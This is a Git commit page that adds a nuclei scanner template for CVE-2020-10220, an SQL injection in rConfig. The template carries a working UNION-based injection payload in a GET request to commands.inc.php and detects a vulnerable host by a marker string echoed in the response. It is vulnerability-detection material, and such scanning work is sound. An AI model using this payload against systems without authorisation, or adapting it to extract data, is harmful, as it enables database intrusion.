daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2020-10220.yaml

patch-1
SaN ThosH 2021-02-15 01:15:52 +05:30 committed by GitHub
parent 4ddfc3b1ef
commit 4bb909aeb7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
cves/2020/CVE-2020-10220.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2020-10220
info:
name: rConfig SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220
tags: SQLI
requests:
- method: GET
path:
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)%20limit%200,1),NULL--"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body